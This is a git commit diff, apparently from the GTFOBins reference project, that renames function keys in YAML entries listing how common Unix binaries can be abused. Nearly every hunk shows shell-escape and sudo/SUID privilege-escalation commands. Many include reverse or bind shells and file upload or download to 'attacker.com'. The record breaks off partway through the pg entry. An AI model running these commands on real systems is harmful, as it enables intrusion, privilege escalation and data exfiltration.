Adopt new function names

This commit is contained in:
Emilio Pinna 2018-10-05 18:55:38 +01:00
parent 1c77f099d3
commit dd337b5ddf
110 changed files with 354 additions and 354 deletions

View File

@ -19,8 +19,8 @@ reverse-shell:
It can send back a reverse shell to a listening attacker to open a remote
network access.
reverse-non-interactive-shell:
label: Reverse non-interactive shell
non-interactive-reverse-shell:
label: Non-interactive reverse shell
description: |
It can send back a non-interactive reverse shell to a listening attacker to
open a remote network access.
@ -30,8 +30,8 @@ bind-shell:
description: |
It can bind a shell to a local port to allow remote network access.
bind-non-interactive-shell:
label: Bind non-interactive shell
non-interactive-bind-shell:
label: Non-interactive bind shell
description: |
It can bind a non-interactive shell to a local port to allow remote network
access.

View File

@ -1,11 +1,11 @@
---
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
functions:
execute-interactive:
shell:
- code: |
apt-get changelog apt
!/bin/sh
sudo-enabled:
sudo:
- code: |
sudo apt-get changelog apt
!/bin/sh

View File

@ -1,11 +1,11 @@
---
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
functions:
execute-interactive:
shell:
- code: |
apt-get changelog apt
!/bin/sh
sudo-enabled:
sudo:
- code: |
sudo apt-get changelog apt
!/bin/sh

View File

@ -1,7 +1,7 @@
---
description: Note that the subprocess is immediately sent to the background.
functions:
execute-non-interactive:
command:
- code: |
COMMAND='id'
TF=$(mktemp)
@ -10,14 +10,14 @@ functions:
aria2c --on-download-error=$TF http://x
- description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.
code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
suid-enabled:
suid:
- code: |
COMMAND='id'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
./aria2c --on-download-error=$TF http://x
sudo-enabled:
sudo:
- code: |
COMMAND='id'
TF=$(mktemp)

View File

@ -1,13 +1,13 @@
---
functions:
execute-interactive:
shell:
- code: ash
file-write:
- code: |
export LFILE=file_to_write
ash -c 'echo DATA > $LFILE'
suid-enabled:
suid:
- code: "./ash"
sudo-enabled:
sudo:
- code: sudo ash
---

View File

@ -1,8 +1,8 @@
---
functions:
execute-interactive:
shell:
- code: awk 'BEGIN {system("/bin/sh")}'
reverse-shell-non-interactive:
non-interactive-reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
@ -11,7 +11,7 @@ functions:
s = "/inet/tcp/0/" RHOST "/" RPORT;
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
bind-shell-non-interactive:
non-interactive-bind-shell:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: |
LPORT=12345
@ -27,8 +27,8 @@ functions:
- code: |
LFILE=file_to_read
awk '//' "$LFILE"
sudo-enabled:
sudo:
- code: sudo awk 'BEGIN {system("/bin/sh")}'
suid-limited:
limited-suid:
- code: ./awk 'BEGIN {system("/bin/sh")}'
---

View File

@ -4,11 +4,11 @@ functions:
- code: |
LFILE=file_to_read
base64 "$LFILE" | base64 --decode
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./base64 "$LFILE" | base64 --decode
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo base64 "$LFILE" | base64 --decode

View File

@ -1,14 +1,14 @@
---
functions:
execute-interactive:
shell:
- code: bash
reverse-shell-interactive:
reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
upload:
file-upload:
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: |
export RHOST=attacker.com
@ -21,7 +21,7 @@ functions:
export RPORT=12345
export LFILE=file_to_send
bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
download:
file-download:
- description: Fetch a remote file via HTTP GET request.
code: |
export RHOST=attacker.com
@ -58,8 +58,8 @@ functions:
HISTTIMEFORMAT=$'\r\e[K'
history -r $LFILE
history
suid-enabled:
suid:
- code: "./bash -p"
sudo-enabled:
sudo:
- code: sudo bash
---

View File

@ -1,9 +1,9 @@
---
description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check what GTFBins binaries are supported. Here some example.
functions:
execute-interactive:
shell:
- code: busybox sh
upload:
file-upload:
- description: Serve files in the local folder running an HTTP server.
code: |
export LPORT=12345
@ -16,9 +16,9 @@ functions:
- code: |
LFILE=file_to_read
./busybox cat "$LFILE"
suid-enabled:
suid:
- description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration.
code: "./busybox sh"
sudo-enabled:
sudo:
- code: sudo busybox sh
---

View File

@ -4,11 +4,11 @@ functions:
- code: |
LFILE=file_to_read
cat "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./cat "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo cat "$LFILE"

View File

@ -1,11 +1,11 @@
---
description: This can be run with elevated privileges to change permissions and then read, write, or execute a file.
functions:
suid-enabled:
suid:
- code: |
LFILE=file_to_change
./chmod 0777 $LFILE
sudo-enabled:
sudo:
- code: |
LFILE=file_to_change
sudo chmod 0777 $LFILE

View File

@ -1,11 +1,11 @@
---
description: This can be run with elevated privileges to change ownership and then read, write, or execute a file.
functions:
suid-enabled:
suid:
- code: |
LFILE=file_to_change
./chown $(id -un):$(id -gn) $LFILE
sudo-enabled:
sudo:
- code: |
LFILE=file_to_change
sudo chown $(id -un):$(id -gn) $LFILE

View File

@ -1,13 +1,13 @@
---
description: This can be used to copy and then read or write files from a restricted file systems or with elevated privileges.
functions:
suid-enabled:
suid:
- code: |
LFILE=file_to_write
TF=$(mktemp)
echo "DATA" > $TF
./cp $TF $LFILE
sudo-enabled:
sudo:
- code: |
LFILE=file_to_write
TF=$(mktemp)

View File

@ -1,7 +1,7 @@
---
functions:
execute-interactive:
shell:
- code: cpulimit -l 100 -f /bin/sh
sudo-enabled:
sudo:
- code: sudo cpulimit -l 100 -f /bin/sh
---

View File

@ -1,9 +1,9 @@
---
functions:
execute-non-interactive:
command:
- description: The commands are executed according to the crontab file edited via the `crontab` utility.
code: crontab -e
sudo-enabled:
sudo:
- description: The commands are executed according to the crontab file edited via the `crontab` utility.
code: sudo crontab -e
---

View File

@ -1,13 +1,13 @@
---
functions:
execute-interactive:
shell:
- code: csh
file-write:
- code: |
export LFILE=file_to_write
ash -c 'echo DATA > $LFILE'
suid-enabled:
suid:
- code: "./csh -b"
sudo-enabled:
sudo:
- code: sudo csh
---

View File

@ -1,12 +1,12 @@
---
functions:
upload:
file-upload:
- description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Omit the `@` to send hard-coded data.
code: |
URL=http://attacker.com/
LFILE=file_to_send
curl -X POST -d @$file_to_send $URL
download:
file-download:
- description: Fetch a remote file via HTTP GET request.
code: |
URL=http://attacker.com/file_to_get
@ -17,13 +17,13 @@ functions:
code: |
LFILE=/tmp/file_to_read
curl file://$LFILE
suid-enabled:
suid:
- description: Fetch a remote file via HTTP GET request.
code: |
URL=http://attacker.com/file_to_get
LFILE=file_to_save
./curl $URL -o $LFILE
sudo-enabled:
sudo:
- description: Fetch a remote file via HTTP GET request.
code: |
URL=http://attacker.com/file_to_get

View File

@ -4,11 +4,11 @@ functions:
- code: |
LFILE=file_to_read
cut -d "" -f1 "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./cut -d "" -f1 "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo cut -d "" -f1 "$LFILE"

View File

@ -1,13 +1,13 @@
---
functions:
execute-interactive:
shell:
- code: dash
file-write:
- code: |
export LFILE=file_to_write
ash -c 'echo DATA > $LFILE'
suid-enabled:
suid:
- code: ./dash -p
sudo-enabled:
sudo:
- code: sudo dash
---

View File

@ -8,11 +8,11 @@ functions:
- code: |
LFILE=file_to_read
date -f $LFILE
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./date -f $LFILE
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo date -f $LFILE

View File

@ -8,11 +8,11 @@ functions:
- code: |
LFILE=file_to_read
dd if=LFILE
suid-enabled:
suid:
- code: |
LFILE=file_to_write
echo "data" | ./dd of=$LFILE
sudo-enabled:
sudo:
- code: |
LFILE=file_to_write
echo "data" | sudo -E dd of=$LFILE

View File

@ -4,11 +4,11 @@ functions:
- code: |
LFILE=file_to_read
diff --line-format=%L /dev/null $LFILE
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./diff --line-format=%L /dev/null $LFILE
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo diff --line-format=%L /dev/null $LFILE

View File

@ -2,11 +2,11 @@
description: |
Exploit the fact that Docker runs as root to create a SUID binary on the host using a container. This requires the user to be privileged enough to run docker, e.g. being in the `docker` group. Any other Docker Linux image should work, e.g., `debian`.
functions:
sudo-enabled:
sudo:
- code: |
sudo docker run --rm -v /home/$USER:/h_docs ubuntu \
sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p
suid-enabled:
suid:
- code: |
./docker run --rm -v /home/$USER:/h_docs ubuntu \
sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p

View File

@ -1,11 +1,11 @@
---
functions:
execute-interactive:
shell:
- code: |
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
easy_install $TF
reverse-shell-interactive:
reverse-shell:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
@ -16,7 +16,7 @@ functions:
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")' > $TF/setup.py
easy_install $TF
upload:
file-upload:
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: |
export URL=http://attacker.com/
@ -36,7 +36,7 @@ functions:
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py
easy_install $TF
download:
file-download:
- description: Fetch a remote file via HTTP GET request. The file path must be absolute.
code: |
export URL=http://attacker.com/file_to_get
@ -62,12 +62,12 @@ functions:
TF=$(mktemp -d)
echo 'print(open("file_to_read").read())' > $TF/setup.py
easy_install $TF
load-library:
library-load:
- code: |
TF=$(mktemp -d)
echo 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' > $TF/setup.py
easy_install $TF
sudo-enabled:
sudo:
- code: |
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py

View File

@ -1,6 +1,6 @@
---
functions:
execute-interactive:
shell:
- code: |
ed
!/bin/sh
@ -17,11 +17,11 @@ functions:
ed file_to_read
,p
q
sudo-enabled:
sudo:
- code: |
sudo ed
!/bin/sh
suid-limited:
limited-suid:
- code: |
./ed
!/bin/sh

View File

@ -1,6 +1,6 @@
---
functions:
execute-interactive:
shell:
- code: emacs -Q -nw --eval '(term "/bin/sh")'
file-write:
- code: |
@ -9,8 +9,8 @@ functions:
C-x C-s
file-read:
- code: emacs file_to_read
suid-enabled:
suid:
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
sudo-enabled:
sudo:
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
---

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: env /bin/sh
suid-enabled:
suid:
- code: ./env /bin/sh -p
sudo-enabled:
sudo:
- code: sudo env /bin/sh
---

View File

@ -5,11 +5,11 @@ functions:
- code: |
LFILE=file_to_read
expand "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./expand "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo expand "$LFILE"

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: expect -c 'spawn /bin/sh;interact'
suid-enabled:
suid:
- code: ./expect -c 'spawn /bin/sh -p;interact'
sudo-enabled:
sudo:
- code: sudo expect -c 'spawn /bin/sh;interact'
---

View File

@ -1,11 +1,11 @@
---
functions:
execute-interactive:
shell:
- code: |
TF=$(mktemp -d)
echo 'exec("/bin/sh")' > $TF/x.rb
FACTERLIB=$TF facter
sudo-enabled:
sudo:
- code: |
TF=$(mktemp -d)
echo 'exec("/bin/sh")' > $TF/x.rb

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: find . -exec /bin/sh \; -quit
suid-enabled:
suid:
- code: ./find . -exec /bin/sh -p \; -quit
sudo-enabled:
sudo:
- code: sudo find . -exec /bin/sh \; -quit
---

View File

@ -2,13 +2,13 @@
description: |
`finger` hangs waiting for the remote peer to close the socket.
functions:
upload:
file-upload:
- description: Send a binary file to a TCP port. Run `sudo nc -l -p 79 | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
code: |
RHOST=attacker.com
LFILE=file_to_send
finger "$(base64 $LFILE)@$RHOST"
download:
file-download:
- description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | sudo nc -l -p 79` on the attacker box to send the file.
code: |
RHOST=attacker.com

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: flock -u / /bin/sh
suid-enabled:
suid:
- code: ./flock -u / /bin/sh -p
sudo-enabled:
sudo:
- code: sudo flock -u / /bin/sh
---

View File

@ -5,11 +5,11 @@ functions:
- code: |
LFILE=file_to_read
fmt -pNON_EXISTING_PREFIX "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./fmt -pNON_EXISTING_PREFIX "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo fmt -pNON_EXISTING_PREFIX "$LFILE"

View File

@ -4,11 +4,11 @@ functions:
- code: |
LFILE=file_to_read
fold -w99999999 "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./fold -w99999999 "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo fold -w99999999 "$LFILE"

View File

@ -1,22 +1,22 @@
---
functions:
execute-interactive:
shell:
- code: |
ftp
!/bin/sh
upload:
file-upload:
- description: Send local file to a FTP server.
code: |
RHOST=attacker.com
ftp $RHOST
put file_to_send
download:
file-download:
- description: Fetch a remote file from a FTP server.
code: |
RHOST=attacker.com
ftp $RHOST
get file_to_get
sudo-enabled:
sudo:
- code: |
sudo ftp
!/bin/sh

View File

@ -1,8 +1,8 @@
---
functions:
execute-interactive:
shell:
- code: gdb -nx -ex '!sh' -ex quit
reverse-shell-interactive:
reverse-shell:
- description: This requires that GDB is compiled with Python support. Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
@ -11,7 +11,7 @@ functions:
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")' -ex quit
upload:
file-upload:
- description: This requires that GDB is compiled with Python support. Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: |
export URL=http://attacker.com/
@ -27,7 +27,7 @@ functions:
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' -ex quit
download:
file-download:
- description: This requires that GDB is compiled with Python support. Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
@ -44,12 +44,12 @@ functions:
file-read:
- description: This requires that GDB is compiled with Python support.
code: gdb -nx -ex 'python print(open("file_to_read").read())' -ex quit
load-library:
library-load:
- description: This requires that GDB is compiled with Python support.
code: gdb -nx -ex 'python from ctypes import cdll; cdll.LoadLibrary("lib.so")' -ex quit
sudo-enabled:
sudo:
- code: sudo gdb -nx -ex '!sh' -ex quit
capabilities-enabled:
capabilities:
- description: This requires that GDB is compiled with Python support.
code: ./gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit
---

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: PAGER='sh -c "exec sh 0<&1"' git -p help
sudo-enabled:
sudo:
- code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
suid-limited:
limited-suid:
- code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
---

View File

@ -6,11 +6,11 @@ functions:
- code: |
LFILE=file_to_read
grep '' $LFILE
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./grep '' $LFILE
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo grep '' $LFILE

View File

@ -4,11 +4,11 @@ functions:
- code: |
LFILE=file_to_read
head -c1G "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./head -c1G "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo head -c1G "$LFILE"

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: ionice /bin/sh
suid-enabled:
suid:
- code: ./ionice /bin/sh -p
sudo-enabled:
sudo:
- code: sudo ionice /bin/sh
---

View File

@ -4,11 +4,11 @@ description: |
This might not work if run by unprivileged users depending on the system configuration.
functions:
execute-interactive:
shell:
- code: |
journalctl
!/bin/sh
sudo-enabled:
sudo:
- code: |
sudo journalctl
!/bin/sh

View File

@ -4,11 +4,11 @@ functions:
- code: |
LFILE=file_to_read
jq -Rr . "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./jq -Rr . "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo jq -Rr . "$LFILE"

View File

@ -1,14 +1,14 @@
---
functions:
execute-interactive:
shell:
- code: ksh
reverse-shell-interactive:
reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
upload:
file-upload:
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: |
export RHOST=attacker.com
@ -21,7 +21,7 @@ functions:
export RPORT=12345
export LFILE=file_to_send
ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
download:
file-download:
- description: Fetch a remote file via HTTP GET request.
code: |
export RHOST=attacker.com
@ -49,8 +49,8 @@ functions:
code: |
export LFILE=file_to_read
ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
suid-enabled:
suid:
- code: ./ksh -p
sudo-enabled:
sudo:
- code: sudo ksh
---

View File

@ -7,10 +7,10 @@ description: |
/lib64/ld-linux-x86-64.so.2
```
functions:
execute-interactive:
shell:
- code: /lib/ld.so /bin/sh
suid-enabled:
suid:
- code: ./ld.so /bin/sh -p
sudo-enabled:
sudo:
- code: sudo /lib/ld.so /bin/sh
---

View File

@ -1,6 +1,6 @@
---
functions:
execute-interactive:
shell:
- code: |
less /etc/profile
!/bin/sh
@ -14,10 +14,10 @@ functions:
echo DATA | less
sfile_to_write
q
sudo-enabled:
sudo:
- code: |
sudo less /etc/profile
!/bin/sh
suid-enabled:
suid:
- code: ./less file_to_read
---

View File

@ -1,7 +1,7 @@
---
functions:
execute-interactive:
shell:
- code: ltrace -b -L /bin/sh
sudo-enabled:
sudo:
- code: sudo ltrace -b -L /bin/sh
---

View File

@ -1,8 +1,8 @@
---
functions:
execute-interactive:
shell:
- code: lua -e 'os.execute("/bin/sh")'
reverse-shell-non-interactive:
non-interactive-reverse-shell:
- description: Run ``nc -l -p 12345`` on the attacker box to receive the shell. This requires `lua-socket` installed.
code: |
export RHOST=attacker.com
@ -15,7 +15,7 @@ functions:
local b=assert(f:read("*a"));t:send(b);
end;
f:close();t:close();'
bind-shell-non-interactive:
non-interactive-bind-shell:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell. This requires `lua-socket` installed.
code: |
export LPORT=12345
@ -26,7 +26,7 @@ functions:
local r,x=c:receive();local f=assert(io.popen(r,"r"));
local b=assert(f:read("*a"));c:send(b);
end;c:close();f:close();'
upload:
file-upload:
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires `lua-socket` installed.
code: |
RHOST=attacker.com
@ -41,7 +41,7 @@ functions:
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d);
t:close();'
download:
file-download:
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345
< "file_to_send"` on the attacker box to send the file. This requires `lua-socket` installed.
code: |
@ -59,8 +59,8 @@ functions:
- code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("DATA"); io.close(f);'
file-read:
- code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);'
sudo-enabled:
sudo:
- code: sudo lua -e 'os.execute("/bin/sh")'
suid-limited:
limited-suid:
- code: ./lua -e 'os.execute("/bin/sh")'
---

View File

@ -1,13 +1,13 @@
---
functions:
execute-interactive:
shell:
- description: This creates a valid Mbox file which may be required by the binary.
code: |
TF=$(mktemp)
echo "From nobody@localhost $(date)" > $TF
mail -f $TF
!/bin/sh
sudo-enabled:
sudo:
- description: This creates a valid Mbox file which may be required by the binary.
code: |
TF=$(mktemp)

View File

@ -1,7 +1,7 @@
---
description: All these examples only work with GNU `make` due to the lack of support of the `--eval` flag. The same can be achieved by using a proper `Makefile` or by passing the content via stdin using `-f -`.
functions:
execute-interactive:
shell:
- code: |
COMMAND='/bin/sh'
make -s --eval=$'x:\n\t-'"$COMMAND"
@ -10,11 +10,11 @@ functions:
code: |
LFILE=file_to_write
make -s --eval="\$(file >$LFILE,DATA)" .
suid-enabled:
suid:
- code: |
COMMAND='/bin/sh -p'
./make -s --eval=$'x:\n\t-'"$COMMAND"
sudo-enabled:
sudo:
- code: |
COMMAND='/bin/sh'
sudo make -s --eval=$'x:\n\t-'"$COMMAND"

View File

@ -1,16 +1,16 @@
---
functions:
execute-interactive:
shell:
- code: |
man man
!/bin/sh
file-read:
- code: man file_to_read
sudo-enabled:
sudo:
- code: |
sudo man man
!/bin/sh
suid-limited:
limited-suid:
- code: |
./man man
!/bin/sh

View File

@ -1,14 +1,14 @@
---
functions:
execute-interactive:
shell:
- code: |
TERM= more /etc/profile
!/bin/sh
file-read:
- code: more file_to_read
suid-enabled:
suid:
- code: ./more file_to_read
sudo-enabled:
sudo:
- code: |
TERM= sudo -E more /etc/profile
!/bin/sh

View File

@ -1,6 +1,6 @@
---
functions:
sudo-enabled:
sudo:
- description: Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell.
code: |
sudo mount -o bind /bin/sh /bin/mount

View File

@ -1,13 +1,13 @@
---
description: This can be used to move and then read or write files from a restricted file systems or with elevated privileges.
functions:
suid-enabled:
suid:
- code: |
LFILE=file_to_write
TF=$(mktemp)
echo "DATA" > $TF
./mv $TF $LFILE
sudo-enabled:
sudo:
- code: |
LFILE=file_to_write
TF=$(mktemp)

View File

@ -1,10 +1,10 @@
---
description: A valid MySQL server must be available.
functions:
execute-interactive:
shell:
- code: mysql -e '\! /bin/sh'
sudo-enabled:
sudo:
- code: sudo mysql -e '\! /bin/sh'
suid-limited:
limited-suid:
- code: ./mysql -e '\! /bin/sh'
---

View File

@ -1,6 +1,6 @@
---
functions:
execute-interactive:
shell:
- code: |
TF=$(mktemp)
echo 'exec sh' > $TF
@ -14,14 +14,14 @@ functions:
^O
file-read:
- code: nano file_to_read
suid-enabled:
suid:
- code: |
TF=$(mktemp)
echo 'exec sh -p' > $TF
chmod +x $TF
./nano -s $TF /etc/hosts
^T
sudo-enabled:
sudo:
- code: |
TF=$(mktemp)
echo 'exec sh' > $TF

View File

@ -1,36 +1,36 @@
---
functions:
reverse-shell-interactive:
reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
code: |
RHOST=attacker.com
RPORT=12345
nc -e /bin/sh $RHOST $RPORT
bind-shell-interactive:
bind-shell:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell. This only works with netcat traditional.
code: |
LPORT=12345
nc -l -p $LPORT -e /bin/sh
upload:
file-upload:
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
code: |
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
nc $RHOST $RPORT < "$LFILE"
download:
file-download:
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
code: |
LPORT=12345
LFILE=file_to_save
nc -l -p $LPORT > "$LFILE"
sudo-enabled:
sudo:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
code: |
RHOST=attacker.com
RPORT=12345
sudo nc -e /bin/sh $RHOST $RPORT
suid-limited:
limited-suid:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
code: |
RHOST=attacker.com

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: nice /bin/sh
suid-enabled:
suid:
- code: ./nice /bin/sh -p
sudo-enabled:
sudo:
- code: sudo nice /bin/sh
---

View File

@ -5,11 +5,11 @@ functions:
- code: |
LFILE=file_to_read
nl -bn -w1 -s '' $LFILE
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./nl -bn -w1 -s '' $LFILE
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo nl -bn -w1 -s '' $LFILE

View File

@ -1,12 +1,12 @@
---
functions:
execute-interactive:
shell:
- description: Input echo is disabled.
code: |
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
nmap --script=$TF
reverse-shell-non-interactive:
non-interactive-reverse-shell:
- description: Run ``nc -l -p 12345`` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
@ -21,7 +21,7 @@ functions:
end;
f:close();t:close();' > $TF
nmap --script=$TF
bind-shell-non-interactive:
non-interactive-bind-shell:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: |
export LPORT=12345
@ -34,7 +34,7 @@ functions:
local b=assert(f:read("*a"));c:send(b);
end;c:close();f:close();' > $TF
nmap --script=$TF
upload:
file-upload:
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
code: |
export RHOST=attacker.com
@ -50,7 +50,7 @@ functions:
t:send(d);
t:close();' > $TF
nmap --script=$TF
download:
file-download:
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345
< "file_to_send"` on the attacker box to send the file.
code: |
@ -76,13 +76,13 @@ functions:
TF=$(mktemp)
echo 'lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF
nmap --script=$TF
sudo-enabled:
sudo:
- description: Input echo is disabled.
code: |
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF
suid-limited:
limited-suid:
- description: Input echo is disabled.
code: |
TF=$(mktemp)

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: |
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
reverse-shell-interactive:
reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
@ -14,7 +14,7 @@ functions:
sh.stdout.pipe(this);
sh.stderr.pipe(this);
});'
bind-shell-interactive:
bind-shell:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: |
export LPORT=12345
@ -24,13 +24,13 @@ functions:
sh.stdout.pipe(client);
sh.stderr.pipe(client);
}).listen(process.env.LPORT);'
suid-enabled:
suid:
- code: |
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
sudo-enabled:
sudo:
- code: |
sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
capabilities-enabled:
capabilities:
- code: |
./node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
---

View File

@ -5,11 +5,11 @@ functions:
- code: |
LFILE=file_to_read
od -An -c -w9999 "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./od -An -c -w9999 "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo od -An -c -w9999 "$LFILE"

View File

@ -1,17 +1,17 @@
---
functions:
execute-interactive:
shell:
- code: perl -e 'exec "/bin/sh";'
reverse-shell-interactive:
reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
suid-enabled:
suid:
- code: ./perl -e 'exec "/bin/sh";'
sudo-enabled:
sudo:
- code: sudo perl -e 'exec "/bin/sh";'
capabilities-enabled:
capabilities:
- code: ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
---

View File

@ -1,15 +1,15 @@
---
functions:
execute-interactive:
shell:
- code: |
pg /etc/profile
!/bin/sh
file-read:
- code: pg file_to_read
sudo-enabled:
sudo:
- code: |
